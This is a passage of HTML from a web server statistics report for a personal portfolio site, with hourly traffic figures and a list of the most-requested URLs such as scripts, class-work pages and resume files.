ALIGN=right><FONT SIZE="-2">3.33%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>152</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.83%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.81%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>176</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5450</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.46%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>52</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1618</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">31.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>305</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">9.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>42</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1313</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">55.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>477</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14782</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">12.10%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>103</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>83</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.64%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.55%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>159</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4928</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.03%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>353</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.92%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>317</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">10.07%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>41</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.74%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>374</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11592</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">9.49%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>271</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.31%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>237</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.53%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.23%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>342</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">8.67%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>352</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.90%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>314</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">9.97%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>458</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14196</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">11.62%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>282</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.53%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>248</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.85%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>415</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12870</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">10.54%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>89</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.74%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>79</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.51%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.64%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>120</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3717</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.04%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>133</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>109</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.46%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.89%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>173</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5376</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.40%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>75</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.47%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>60</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.91%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>56</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1750</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.43%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>67</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.31%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>57</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.81%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.55%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>42</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1302</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.07%</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPURLS"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=6>Top 100 of 154 Total URLs</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#FF0000" ALIGN=center COLSPAN=2><FONT SIZE="-1">KBytes</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">URL</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>259</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.07%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>707</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.58%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/">/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>103</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>268</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.22%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/styles.css">/styles.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>102</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>188</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.15%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/js/fancyBox.js">/js/fancyBox.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>102</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1743</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.43%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/js/jquery.fancybox.js">/js/jquery.fancybox.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>102</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>55</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/js/slideWorks.js">/js/slideWorks.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>101</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.98%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>50</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/js/contactForm.js">/js/contactForm.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>101</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.98%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13197</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">10.80%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/js/jquery-1.7.1.js">/js/jquery-1.7.1.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>96</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>361</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.30%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/works.html">/works.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>72</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.41%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>188</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.15%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/styles/jquery.fancybox.css">/styles/jquery.fancybox.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>259</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.21%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/">/ClassWork/IT428/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>40</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>169</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.14%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/">/ClassWork/IT422/FinalProject/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.67%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>118</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/SearchEngine.html">/ClassWork/IT428/SearchEngine.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.65%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>114</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.09%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/about.html">/about.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>32</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.63%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>48</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/ExternalStyleSheet.css">/ClassWork/IT428/ExternalStyleSheet.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>106</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.09%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Assignment4.html">/ClassWork/IT428/Assignment4.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>91</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.07%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Assignment2.html">/ClassWork/IT428/Assignment2.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.57%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1199</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.98%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/documents/Computer_Resume_ONE_PAGE.doc">/documents/Computer_Resume_ONE_PAGE.doc</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.51%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>87</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.07%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/BusinessPresentation.html">/ClassWork/IT428/BusinessPresentation.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>86</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.07%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/DataGridPhotos.html">/ClassWork/IT428/DataGridPhotos.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.47%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>83</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.07%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/SkipIntro.html">/ClassWork/IT428/SkipIntro.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.47%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2769</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.27%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/documents/JohnnyEdickWebResume.pdf">/documents/JohnnyEdickWebResume.pdf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.45%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>55</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.05%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/Progress/">/ClassWork/IT422/FinalProject/Progress/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.45%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>77</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Assignment3.html">/ClassWork/IT428/Assignment3.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.43%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>69</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Assignment1.html">/ClassWork/IT428/Assignment1.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1403</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.15%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/indexSlideShow.swf">/ClassWork/IT428/indexSlideShow.swf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.31%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>384</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.31%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/hc2010.swf">/ClassWork/IT428/hc2010.swf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.29%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1793</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.47%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/documents/Typographic Flash Cards.pdf">/documents/Typographic Flash Cards.pdf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.24%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>875</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.72%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/IMAGES/indexslide.swf">/ClassWork/IT422/FinalProject/IMAGES/indexslide.swf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.20%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>77</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/5secIntro.swf">/ClassWork/IT428/5secIntro.swf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.18%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>74</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Scripts/swfobject_modified.js">/ClassWork/IT428/Scripts/swfobject_modified.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.18%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>182</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.15%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/SpryAssets/SpryEffects.js">/ClassWork/IT428/SpryAssets/SpryEffects.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>32</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.18%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>73</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/SpryAssets/SpryMenuBar.js">/ClassWork/IT428/SpryAssets/SpryMenuBar.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.18%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/SpryAssets/SpryMenuBarHorizontal.css">/ClassWork/IT428/SpryAssets/SpryMenuBarHorizontal.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.18%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/indexSlideUpTop.html">/indexSlideUpTop.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>35</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT 